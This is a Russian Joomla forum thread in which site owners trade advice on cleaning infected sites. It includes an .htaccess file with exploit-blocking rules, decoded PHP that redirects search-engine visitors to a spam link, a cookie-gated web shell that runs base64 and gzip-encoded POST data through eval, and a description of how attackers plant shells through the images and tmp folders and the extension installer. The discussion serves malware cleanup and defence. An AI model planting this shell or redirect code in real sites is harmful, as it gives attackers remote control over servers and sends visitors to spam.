Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 792 Ответов
  • 275541 Просмотров
*

slava088

  • Захожу иногда
  • 79
  • 1 / 0
Код
AddType application/x-httpd-php5 .php

##
# @version $Id: htaccess.txt 14401 2010-01-26 14:10:00Z louis $
# @package Joomla
# @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##

#####################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your SEF url's.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################
php_value memory_limit "128M"
##  Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
#  mod_rewrite in use

RewriteEngine On
RewriteCond %{HTTP_HOST} ^www.мой_сайт$ [NC]
RewriteRule ^(.*)$ http://мой_сайт/$1 [R=301,L]

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## Deny access to extension XML files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension XML files
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla! Directory (just / for root)

# RewriteBase /

########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$  [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section

Мой .htaccess Хочу полностью разобраться, вроде ничего подозрительного нет.
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Мой .htaccess Хочу полностью разобраться, вроде ничего подозрительного нет.
Да, чистый.Тогда только искать редирект в файлах PHP.
*

slava088

  • Захожу иногда
  • 79
  • 1 / 0
Как прописывается редирект? Если 301 то тогда в ТК можем задать поиск по 301, если base64 не закодировано, то должны быть указаны ссылки, однако они тоже не находятся, каким спосбом еще может кодироваться код?
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Как прописывается редирект?если base64 не закодировано,
Кто сказал? плохо искал
А в самом шаблоне не встроена проверка на User-Agent ?
*

slava088

  • Захожу иногда
  • 79
  • 1 / 0
Скажите по каким запросам искать?
Как искать?
*

lord_sot

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
У меня была проблема с тем что все сайты на хостинге заражались вирусом, делающим редирект с мобильных устройств. Все сайты были подчищены от вредоносного кода //Спасибо совету "поиск по слову base64_decode" // но периодически эта хрень снова возникает - спасают только восстановления из бэкапов. Все пароли были изменены, но эффекта 0. Вот со вчера на сегодня снова словил эту тему и вытащил access log. Может быть кто-нибудь сможет в нем увидеть как именно была произведено заражение?
Спойлер
[свернуть]
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Уфф, до этого справлялся теперь что то никак

вычистил кучу заразы, обновил, поправил .htaccess, выполнил рекомендации с форума и один фиг через если открывать через поиск яндекса, происходит редирект, если открывать напрямую то все нормально

****

Код
редирект идёт на http://ds-konzepte.info/libraries/pear/arch/pages/if.php

кто нибудь поборол аналогичную заразу?
Сегодня чистил сайт на заказ, там была зараза которая редиректила на этот сайт!
вот пример самой заразы в расшифрованном виде, которая редиректит:

Цитировать
error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){      
      header("Location: http://tinyurl.com/a4ak6x9");
      exit();
   }
}
}
Заразу победил! ^-^

P.S: аналезируя код на уязвимые моменты и вредоносность обнаружил что зараза была в одном установочном компаненте, который волялся в исходной папке перед установкой /tmp, архивом, разархевировав нашел протрояненые страници редиректом, пологаю что на источнике откуда были скачены компаненты, протроянены... всего лишь предположение...

для болие быстрого поиска криптованого кода использовал конструкцию для выполнения в консоле:
egrep -H "[поисковая фраза например eval]" `find . -type f -name "[в каких файлах искать, расширения, например :*.php]" -print`
« Последнее редактирование: 02.03.2013, 21:24:36 от flynstrool »
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Как прописывается редирект? Если 301 то тогда в ТК можем задать поиск по 301, если base64 не закодировано, то должны быть указаны ссылки, однако они тоже не находятся, каким спосбом еще может кодироваться код?
попробуй поискать "Location:"
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Как заливают shell:

Все просто нового ни чего не изобрели и не изобретут(хотя возможно но нет уверенности)
файл с shell заливается в основном в папки
Цитировать
images
images/stories
tmp

заливают либо сразу файл shell, либо "якобы картинку" файл с кодом и с расширением от изображения, который после загрузки либо остается таким же или ему меняют расширение, если он остается картинкой то тогда в этой директории появляется еще и файл .htaccesss для того чтоб этот файл работал

Что то не нашел в разделе того как все же это происходит, по каким пунктам шелл поподает все же в эти папки?
Хакер получивший каким либо путем админский доступ, при крива настроеных правах на сайте имеет возможность править конфиги, в результате чего можно дать разрешение медиа загрузчику для заливки шелла, корневая папка для загрузок в медиа идет с /images!
папка tmp!  в Joomla есть такой пункт установка модулей и компонентов, у нее есть два варианта загрузок, первый это с вашей машины на прямую, второй с сторонего сайта!, допустим если грузим со своей машиной, то джумал сначало закачивает в папку tmp и только потом начинает устанавливать его, но так как шелл не предназначен для установки как компонент, Joomla выплюнит вам ошибку, но приэтом шелл останется в папке tmp, вследствие чего мы уже имеем доступ!
вы еще не указали, что при кривых правах можно еще и шаблон править! в который можно вставить свой PHP код!
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Цитировать
P.S: аналезируя код на уязвимые моменты и вредоносность обнаружил что зараза была в одном установочном компоненте, который волялся в исходной папке перед установкой /tmp, архивом, разархевировав нашел протрояненые страници редиректом, пологаю что на источнике откуда были скачены компоненты, протроянены... всего лишь предположение...

А по всему сайту зараза не могла прописаться?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
А по всему сайту зараза не могла прописаться?
возможно все, но если по всему сайт то я так пологаю что скорее у вас утекли данный от ftp аккаунта, потом список таких аккаунтов зарежается впрограмку и програмка автоматом троянит все что можно протроянить, ну вообщем алгоритм не сложный!
*

slava088

  • Захожу иногда
  • 79
  • 1 / 0
Найден кусок кода отвечающий за вывод левых ссылок
Код
<?php $random_key = @yt_fashion15(); ?>
Я так понимаю просто удалением дело не обойдется, скажите алгоритм действия такого вируса?

По запросу base64_decode 57 файлов. Выходит все 57 файлов заражены или там могут быть рабочие файлы? Как их различить?
« Последнее редактирование: 03.03.2013, 09:26:06 от slava088 »
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу

По запросу base64_decode 57 файлов. Выходит все 57 файлов заражены или там могут быть рабочие файлы? Как их различить?
Сравнивать с такими файлами с дистра Joomla. Еще проще удалить все 57, а потом перезалить файлы Joomla.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Найден кусок кода отвечающий за вывод левых ссылок
Код
<?php $random_key = @yt_fashion15(); ?>
Я так понимаю просто удалением дело не обойдется, скажите алгоритм действия такого вируса?

По запросу base64_decode 57 файлов. Выходит все 57 файлов заражены или там могут быть рабочие файлы? Как их различить?
Насколько я знаю, Joomla не использует в своих файлах base64_decode, если лень просматривать каждый файл и разбираться с пречиной происходящего, то делай бэкап БД и переустонавливай все нахрен, но файлы шаблона все же тебе прийдется просмотреть, если шаблоны хочешь те жи оставить
*

Свят

  • Осваиваюсь на форуме
  • 44
  • 1 / 0
  • Не прыгаю за бабочками, они сами липнут ко мне...
на 3 странице данного топика - http://joomlaforum.ru/index.php/topic,246899.msg1272926.html#msg1272926 форумчане уже жаловались на эту проблему. Одним прекрасным солнечным зимним утром мною было обнаружено, что у сайта появилась вторая карта сайта, ведущая на 2500 других ресурсов или статей на самом же сайте - site.ru/?option=/cat/sitemap.html Проблема решилась довольно просто - были закачены файлы обновления Joomla 1.5 с 22 версии по 26 (хоть Joomla стояла и так последней версии). Дело в том, что как обычно - были замечены следы шела в папке картинок и изменён файл .htaccess  в этой же папке на закачку запрещённых форматов. Вроде всё подправил. Прошло два дня и вижу повторяющуюся картину - опять эта злополучная карта сайта, и перезаливка файлов уже не помогает.
Зашёл в логи, и вот, что увидел:
Код
173.199.115.99 - - [03/Mar/2013:04:35:45 +0400] "GET /component/mailto/?tmpl=component&link=aHR0cDovL25yYXZ5LW5hcm9kb3YucnUvYW1lcmlrYS9zZXZlcm5hamEtYW1lcmlrYS9zYWx2YWRvci5odG1s HTTP/1.1" 200 4684 "-" "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)"
173.199.115.99 - - [03/Mar/2013:04:36:31 +0400] "GET /component/mailto/?tmpl=component&link=aHR0cDovL25yYXZ5LW5hcm9kb3YucnUvZXZyYXppamEvZXZyb3BhL21vbGRvdmEuaHRtbA%3D%3D HTTP/1.1" 200 4672 "-" "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)"
173.199.115.99 - - [03/Mar/2013:04:36:43 +0400] "GET /?option=/cat/Rabota-menedzher-kafe.html HTTP/1.1" 200 62430 "-" "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)"

Заранее спасибо, за высказывание идей - как это всё можно исправить! ^-^
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
на 3 странице данного топика - http://joomlaforum.ru/index.php/topic,246899.msg1272926.html#msg1272926 форумчане уже жаловались на эту проблему. Одним прекрасным солнечным зимним утром мною было обнаружено, что у сайта появилась вторая карта сайта, ведущая на 2500 других ресурсов или статей на самом же сайте - site.ru/?option=/cat/sitemap.html Проблема решилась довольно просто - были закачены файлы обновления Joomla 1.5 с 22 версии по 26 (хоть Joomla стояла и так последней версии). Дело в том, что как обычно - были замечены следы шела в папке картинок и изменён файл .htaccess  в этой же папке на закачку запрещённых форматов. Вроде всё подправил. Прошло два дня и вижу повторяющуюся картину - опять эта злополучная карта сайта, и перезаливка файлов уже не помогает.
Зашёл в логи, и вот, что увидел:
Код
173.199.115.99 - - [03/Mar/2013:04:35:45 +0400] "GET /component/mailto/?tmpl=component&link=aHR0cDovL25yYXZ5LW5hcm9kb3YucnUvYW1lcmlrYS9zZXZlcm5hamEtYW1lcmlrYS9zYWx2YWRvci5odG1s HTTP/1.1" 200 4684 "-" "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)"
173.199.115.99 - - [03/Mar/2013:04:36:31 +0400] "GET /component/mailto/?tmpl=component&link=aHR0cDovL25yYXZ5LW5hcm9kb3YucnUvZXZyYXppamEvZXZyb3BhL21vbGRvdmEuaHRtbA%3D%3D HTTP/1.1" 200 4672 "-" "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)"
173.199.115.99 - - [03/Mar/2013:04:36:43 +0400] "GET /?option=/cat/Rabota-menedzher-kafe.html HTTP/1.1" 200 62430 "-" "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)"

Заранее спасибо, за высказывание идей - как это всё можно исправить! ^-^

в переменную link передался параметр равный в декодированом виде из базе64 "http://nravy-narodov.ru/amerika/severnaja-amerika/salvador.html"
во второй строчке передался такой урл: http://nravy-narodov.ru/evrazija/evropa/moldova.html

а вообще такая тактика действий очень похоже на прогоны!, это то что называется черным SEO!
Если это мешает вашему сайту, и вы не можите сами справится, то заказывайте чистку сайта!
*

Свят

  • Осваиваюсь на форуме
  • 44
  • 1 / 0
  • Не прыгаю за бабочками, они сами липнут ко мне...
в переменную link передался параметр равный в декодированом виде из базе64 "http://nravy-narodov.ru/amerika/severnaja-amerika/salvador.html"
во второй строчке передался такой урл: http://nravy-narodov.ru/evrazija/evropa/moldova.html

а вообще такая тактика действий очень похоже на прогоны!, это то что называется черным SEO!
Если это мешает вашему сайту, и вы не можите сами справится, то заказывайте чистку сайта!

winstrool, nravy-narodov.ru это и есть мой сайт:) вот и левая карта сайта - http://nravy-narodov.ru/?option=/cat/sitemap.html
Да вроде впервый раз получилось справиться, может и в этот раз что-нибудь придумается или подскажет кто.
*

klara7

  • Захожу иногда
  • 311
  • 4 / 1
У меня на сайте наплодились кучу однообразных файлов с разными названиями
1 файл:
Цитировать
<?php echo "#!!#";

2 файл
Цитировать
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

Кто-нибудь в курсе что они делают и как с этим безобразием бороться?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
У меня на сайте наплодились кучу однообразных файлов с разными названиями
1 файл:
2 файл
Кто-нибудь в курсе что они делают и как с этим безобразием бороться?
Это шел! такую херь надо убивать!
*

klara7

  • Захожу иногда
  • 311
  • 4 / 1
Убиваю, но их уже просто туча. Проверяю fls.php. Он еще жалуется на
Спойлер
[свернуть]
Как узнать кто из них кто?
*

Свят

  • Осваиваюсь на форуме
  • 44
  • 1 / 0
  • Не прыгаю за бабочками, они сами липнут ко мне...
Убиваю, но их уже просто туча. Проверяю fls.php. Он еще жалуется на
Спойлер
[свернуть]
Как узнать кто из них кто?

На мой взгляд вот эти подозрительны:
Код
File: /home/сайт/public_html/images/stories/Shemi/5559e.php
String:: $_POST[

File: /home/сайт/public_html/images/stories/1.php
String:: $_POST[
Скачайте на комп, и посмотрите в нотпаде, что там такое, если не откроется файл, значит вирус.
Ещё в папке тмп у вас много чего лежит, но это нормально. Всё остальное на мой взгляд прекрасно. Вернитесь к предыдущему бекапу если делали их...
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Когда "оно" прописалось уже неизвестно куда, особенно если php работает в режиме CGI, как на большинстве хостингов, т.е. Apache пишет куда хочет в любую папку с правами 755 и что хочет, то бесполезно уже искать. Тут надо восстанавливать рабочий бэкап, если таковой есть.
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Причина заражения - 99% использование вареза.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Убиваю, но их уже просто туча. Проверяю fls.php. Он еще жалуется на
Спойлер
[свернуть]
Как узнать кто из них кто?
а вы бы не могли показать содержимое файлов:

File: /home/сайт/public_html/tmp/install_4dc918bfa0f9c/ilvm_theme/images/flypage_themes/flypage_admirable/0dc26cba.php
String:: $_POST[

File: /home/сайт/public_html/tmp/install_4dc918bfa0f9c/ilvm_theme/images/administration/header/fa05a8a1df.php
String:: $_POST[

File: /home/сайт/public_html/tmp/install_4dc91853ae6ec/ilvm_theme/templates/product_details/2877b9c.php
String:: $_POST[
хотел бы просмотреть сигнатуру кода.
Их однозначно надо удолять!
и еще откуда вы устонавливали компоненты?
*

playtoppokerru

  • Осваиваюсь на форуме
  • 30
  • 0 / 0
Ау! никто не подскажет, это трояны или нет?
4.
<script language='javascript' type='text/javascript'> <!-- document.write( '</' ); document.write( 'span>' ); //--> </script>
5.
<script language='javascript' type='text/javascript'> <!-- document.write( '<span style=\'display: none;\'>' ); //--> </script>
9.
<script language='javascript' type='text/javascript'> <!-- var prefix = 'mailto:'; var suffix = ''; var attribs = ''; var path = 'href='; var addy99850 = 'support@'; addy99850 = addy99850 + 'trimori.com'; document.write( '<a ' + path + '\'' + prefix + addy99850 + suffix + '\'' + attribs + '>' ); document.write( addy99850 ); document.write( '<\/a>' ); //--> </script>
*

borada

  • Захожу иногда
  • 182
  • 13 / 0
А кто в курсе, проанализируйте код

Код
if ($lang == 'russian' || $lang == 'ukrainian' || $lang == 'belorussian' || $lang == 'ru-RU' || $lang == 'uk-UA' || $lang == 'be-BY') {
$tmpl->addGlobalVar('support', base64_decode('PGEgaHJlZj0iaHR0cDovL3d3dy5qb29tbGF0dW5lLnJ1IiB0aXRsZT0iSkNvbW1lbnRzIiB0YXJnZXQ9Il9ibGFuayI+SkNvbW1lbnRzPC9hPg=='));
} else {
$tmpl->addGlobalVar('support', base64_decode('PGEgaHJlZj0iaHR0cDovL3d3dy5qb29tbGF0dW5lLmNvbSIgdGl0bGU9IkpDb21tZW50cyIgdGFyZ2V0PSJfYmxhbmsiPkpDb21tZW50czwvYT4='));
}

У меня base64_decode('PG...    много в разных файлах
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
А кто в курсе, проанализируйте код
Этот норма, на разработчика.
playtoppokerru
метод document.write( , не вирус.А вот нижний код прописывает ссылку на отправку эмэйл support@trimori.com
klara7
удаляй все файлы с именем, рандомно состоящим из символом и цифр.Только в папке /cache , без фанатизма
*

borada

  • Захожу иногда
  • 182
  • 13 / 0
Этот норма, на разработчика.
playtoppokerru
метод document.write( , не вирус.А вот нижний код прописывает ссылку на отправку эмэйл support@trimori.com
klara7
удаляй все файлы с именем, рандомно состоящим из символом и цифр.Только в папке /cache , без фанатизма
Странная почта, учитывая что этот код в com_phoca...
Еще, по логу заметил, что первый раз прописывается файл типа a1b56a.php  в /components/com_jce/editor/extensions/links/joomlalinks/img

B PhocaGallery еще подозрительный код
Код
$tmpl['md'] = base64_decode('PGRpdiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyBjb2xvcjojZDNkM2QzOyI+UG93ZXJlZCBieSA8YSBocmVmPSJodHRwOi8vd3d3LnBob2NhLmN6IiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lOyIgdGFyZ2V0PSJfYmxhbmsiIHRpdGxlPSJQaG9jYS5jeiI+UGhvY2E8L2E+IDxhIGhyZWY9Imh0dHA6Ly93d3cucGhvY2EuY3ovcGhvY2FnYWxsZXJ5IiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lOyIgdGFyZ2V0PSJfYmxhbmsiIHRpdGxlPSJQaG9jYSBHYWxsZXJ5Ij5HYWxsZXJ5PC9hPjwvZGl2Pg0K');
« Последнее редактирование: 05.03.2013, 09:19:54 от borada »
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
А прочитать сообщение прикрепленное как важное
Цитировать
(последние через что заливают это редактор JCE, менеджер расширений nonumber.nl, ну и старые не актуальные версии joomla)
Код- ссылка на разработчика PhocaGallery
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 504
Последний ответ 14.02.2024, 13:15:59
от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 63316
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 1050
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 3033
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 1830
Последний ответ 22.02.2022, 11:38:15
от AlexP750